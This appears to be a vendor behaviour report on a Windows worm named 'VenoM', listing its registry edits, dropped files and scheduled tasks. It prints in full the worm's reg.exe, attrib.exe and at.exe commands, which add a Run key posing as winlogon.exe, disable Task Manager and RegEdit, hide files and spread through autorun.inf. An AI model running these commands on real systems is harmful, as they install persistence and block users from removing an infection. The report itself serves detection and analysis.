Technical Information
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'CFTMON.EXE' = '%WINDIR%\System\winlogon.exe'
- %WINDIR%\Tasks\At16.job
- %WINDIR%\Tasks\At17.job
- %WINDIR%\Tasks\At15.job
- %WINDIR%\Tasks\At13.job
- %WINDIR%\Tasks\At14.job
- %WINDIR%\Tasks\At18.job
- %WINDIR%\Tasks\At22.job
- %WINDIR%\Tasks\At23.job
- %WINDIR%\Tasks\At21.job
- %WINDIR%\Tasks\At19.job
- %WINDIR%\Tasks\At20.job
- %WINDIR%\Tasks\At12.job
- %WINDIR%\Tasks\At4.job
- %WINDIR%\Tasks\At5.job
- %WINDIR%\Tasks\At3.job
- %WINDIR%\Tasks\At1.job
- %WINDIR%\Tasks\At2.job
- %WINDIR%\Tasks\At6.job
- %WINDIR%\Tasks\At10.job
- %WINDIR%\Tasks\At11.job
- %WINDIR%\Tasks\At9.job
- %WINDIR%\Tasks\At7.job
- %WINDIR%\Tasks\At8.job
- hidden files
- file extensions
- Windows Task Manager (Taskmgr)
- Registry Editor (RegEdit)
- '<SYSTEM32>\at.exe' 0 :13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 1:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 23 /delete
- '<SYSTEM32>\at.exe' 24 /delete
- '<SYSTEM32>\at.exe' 2:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 5:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 6:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 3:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 4:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 16 /delete
- '<SYSTEM32>\at.exe' 17 /delete
- '<SYSTEM32>\at.exe' 14 /delete
- '<SYSTEM32>\at.exe' 15 /delete
- '<SYSTEM32>\at.exe' 18 /delete
- '<SYSTEM32>\at.exe' 21 /delete
- '<SYSTEM32>\at.exe' 22 /delete
- '<SYSTEM32>\at.exe' 19 /delete
- '<SYSTEM32>\at.exe' 20 /delete
- '<SYSTEM32>\at.exe' 18:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 19:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 16:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 17:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 20:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 23:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\ntvdm.exe' -f
- '<SYSTEM32>\at.exe' 21:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 22:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 9:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 10:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 7:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 8:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 11:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 14:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 15:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 12:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 13:13 /interactive "%HOMEPATH%\VenoM.txt"
- '<SYSTEM32>\at.exe' 13 /delete
- '<SYSTEM32>\find.exe' "2008" desktop.inf
- '<SYSTEM32>\attrib.exe' +h %WINDIR%
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d "0" /f
- '<SYSTEM32>\reg.exe' add "HKCU\_VenoM_Software_413 413 413 \Virus" /v estas /d "infectado"
- '<SYSTEM32>\attrib.exe' -h -s "%TEMP%\1.tmp\lol.bat"й /y "%TEMP%\1.tmp\lol.bat" "C:\100% %USERNAME%.exe"
- '<SYSTEM32>\attrib.exe' +s +h C:\VenoM.666\*.exe
- '<SYSTEM32>\attrib.exe' +s +h C:\VenoM.666
- '<SYSTEM32>\attrib.exe' -r -a -s -h C:\*.inf /y autorun.inf C:\autorun.inf
- '<SYSTEM32>\attrib.exe' +s +h +r +a C:\autorun.inf
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v CFTMON.EXE /t REG_SZ /d "%WINDIR%\System\winlogon.exe" /f
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d "1" /f
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\lol.bat""
- '<SYSTEM32>\taskkill.exe' /f /im Ad-Watch.exe
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\Currentversion\Policies\System" /v DisableTaskMgr /t reg_dword /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d "2" /f
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t reg_dword /d "1" /f
- '<SYSTEM32>\at.exe' 6 /delete
- '<SYSTEM32>\at.exe' 7 /delete
- '<SYSTEM32>\at.exe' 4 /delete
- '<SYSTEM32>\at.exe' 5 /delete
- '<SYSTEM32>\at.exe' 8 /delete
- '<SYSTEM32>\at.exe' 11 /delete
- '<SYSTEM32>\at.exe' 12 /delete
- '<SYSTEM32>\at.exe' 9 /delete
- '<SYSTEM32>\at.exe' 10 /delete
- '<SYSTEM32>\attrib.exe' +s +h +r +a Z:\autorun.inf
- '<SYSTEM32>\attrib.exe' +s +h Z:\VenoM.666\*.exe
- '<SYSTEM32>\attrib.exe' -h -s "%TEMP%\1.tmp\lol.bat"й /y "%TEMP%\1.tmp\lol.bat" "Z:\100% %USERNAME%.exe"
- '<SYSTEM32>\attrib.exe' -r -a -s -h Z:\*.inf /y autorun.inf Z:\autorun.inf
- '<SYSTEM32>\attrib.exe' +s +h Z:\VenoM.666
- '<SYSTEM32>\at.exe' 2 /delete
- '<SYSTEM32>\at.exe' 3 /delete
- '<SYSTEM32>\print.exe' VenoM.txt
- '<SYSTEM32>\at.exe' 1 /delete
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFolderOptions' = '00000001'
- %HOMEPATH%\VenoM.txt
- %HOMEPATH%\SendTo\Game Over 413 413 .txt
- %APPDATA%\desktop.inf
- C:\RECYCLER\Papelera de reciclaje compartida.exe
- %HOMEPATH%\autorun.inf
- %APPDATA%\services.exe
- %WINDIR%\Temp\scs5.tmp
- %WINDIR%\Temp\scs6.tmp
- %WINDIR%\Temp\scs3.tmp
- %APPDATA%\lsass.exe
- %WINDIR%\Temp\scs2.tmp
- %WINDIR%\system\winlogon.exe
- %HOMEPATH%\SendTo\Mis documetos.exe
- %APPDATA%\desktop.log
- %TEMP%\1.tmp\lol.bat
- <Current directory>\descarga.jpg
- %HOMEPATH%\SendTo\Disco extraible.pif
- <SYSTEM32>\%USERNAME% 3D.scr
- C:\RECYCLER\Documendos borrados de %USERNAME%.exe
- %WINDIR%.EXE
- %HOMEPATH%\SendTo\Documentos compartidos.scr
- %HOMEPATH%\desktop.inf
- %WINDIR%\Temp\scs5.tmp
- %WINDIR%\Temp\scs6.tmp
- %WINDIR%\Temp\scs2.tmp
- %WINDIR%\Temp\scs3.tmp
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-af8.af4.340004'
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-ad4.ad0.340004'
- ClassName: '(null)' WindowName: '(null)'